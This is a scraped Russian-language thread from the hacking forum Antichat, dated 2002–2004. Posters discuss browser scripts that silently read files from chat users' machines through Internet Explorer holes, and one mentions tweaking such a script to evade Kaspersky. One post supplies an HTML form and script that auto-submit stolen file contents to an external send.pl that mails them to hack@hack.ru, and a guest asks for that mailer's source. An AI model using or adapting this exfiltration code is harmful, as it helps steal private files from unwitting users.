Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.11.2002, 13:15
|
Провел на форуме: 2050916
|
|
to decadancer
Антивир не юзаю по причине резкого сижения быстродействия при его использовании. А кроме того небольшая модификация скрипта - и каспер уже не ругается (это я про demo5)...
Насчет объема пердаваемых данных: Ну представь себе , сидит непродвинутый юзер в чате.... Он шо, видит что там качается ?? Он разве может оценить объем передаваемых данных ?? Ведь у него голяк, никаких naviscope и никаких A4 нету.... А сидит он в чате долго...за это время мноога чего интресного можна утырить....
А с виндой у тя вроде все ок...
to Dj Skeleton™
Wingate тож не поможет...
Правда я однажды видел что некий промежуточный файрвол завернул пакет.... Но это исключение... Файрвол видно дюже умный был...на лету анализировал содержимое скриптов....
|
|
|

01.11.2002, 23:26
|
|
Познающий
Провел на форуме: 5004
|
|
аха, я потом сам додумал: распознать объём нереально, если где-то долго сидишь, ведь и качается через тот же самый порт, порт браузера.. если б другой какой - тогда уж можно было заподозрить, шо это за соединение...
вот это трава некошенная для действий 
реально одна из самых серьёзных штук.
ну не считая всяких других непропатченых (и пропатченых  ) дыр у IE, как я недавно прочёл, аж прозрел: про встроенную в эксплоэр радио-систему, о которой мы все знаем, и заместо которой можно запустить чё угодно своё,..типа когда урл с музычкой не найден, остаётся кусок кода, который запускается.. например, format/ - тьху-3 р. ))
И последний монстр-патч в 1.5 мегабайта ни фига не памагает....
а за винду - эт ты меня обнадежил ).. очинь надеюсь, шо у тя не хватит времени и желания когда-нить меня разочаровать в обратном
всем - приятного пива..тьху ты.. выходных тоисть трезвых..)
|
|
|

01.11.2002, 23:55
|
|
Познающий
Провел на форуме: 0
|
|
мораль - юзайте оперу
|
|
|

02.11.2002, 00:29
|
|
|
кхм кхм... мне промолчать про оперу иль шо нить сказать ?? 
|
|
|

05.11.2002, 01:59
|
|
Новичок
Провел на форуме: 0
|
|
У меня вопрос(ы)  Конкретно по 8-ой демке...
Вот XP ее действительно не пропустило  )) ну да ладно.. поверим Алголу, что в 98 все ок  (93%)
Вот ты еще пишешь - "Прочитанное содержимое файла может быть без труда отправлено на другой сервер" а каким образом? а на мыло может быть отправлено?
|
|
|

05.11.2002, 13:09
|
|
|
Хм... очень просто может быть отправлено... Через форму. Например вот так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> HTML </td></tr><tr><td id="CODE"><span style='color:#333333'>
<<span style='color:blue'>form</span> action="<span style='color  range'>http://antichat.ru/cgi-bin/send.pl</span>" method="<span style='color  range'>post</span>" id="<span style='color  range'>sendForm</span>">
<<span style='color:blue'>input</span> name="<span style='color  range'>to</span>" type="<span style='color  range'>hidden</span>" value="<span style='color  range'>hack@hack.ru</span>">
<<span style='color:blue'>textarea</span> id="<span style='color  range'>textfile</span>" name="<span style='color  range'>textfile</span>"></<span style='color:blue'>textarea</span>>
</<span style='color:blue'>form</span>>
#60;script>
//запихиваем содержимое файла Text в поле формы
textfile.value:=Text;
//отправляем форму скрипту send.pl, который затем отсылает на почту hack@hack.ru
sendForm.submit();
</<span style='color:blue'>script</span>>
</span>[/QUOTE]<span id='postcolor'>
|
|
|

08.01.2004, 06:04
|
|
Guest
Провел на форуме:
|
Замыльте, плиз, исходник send.pl или какой-нибудь другой скрипт для отправления данных из формы на емайл. есть ли такое на javascript, без перла/пхп? естественно без использования "mailto:".
intruder666coбакаfromru.com <- скрипт или ссылку на него
Заранее спасибо!
|
|
|
|

08.01.2004, 12:41
|
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ января 08 2004,05:04)</td></tr><tr><td id="QUOTE">скрипт для отправления данных из формы на емайл. есть ли такое на javascript, без перла/пхп? естественно без использования "mailto:".[/QUOTE]<span id='postcolor'>
Нет такого... Для того что бы послать мыло, нужен почтовый клиент, кторый работает по SMTP. А браузер по этому протоколу не работает, значит обязательно нужна внешняя программа (на перле, пхп и т.п.)
|
|
|

11.01.2004, 15:43
|
|
Администратор
Провел на форуме: 4618051
|
|
В других браузерах это не пройдет... Там актив икс вообще отсутствует...
|
|
|
|
 |
|
|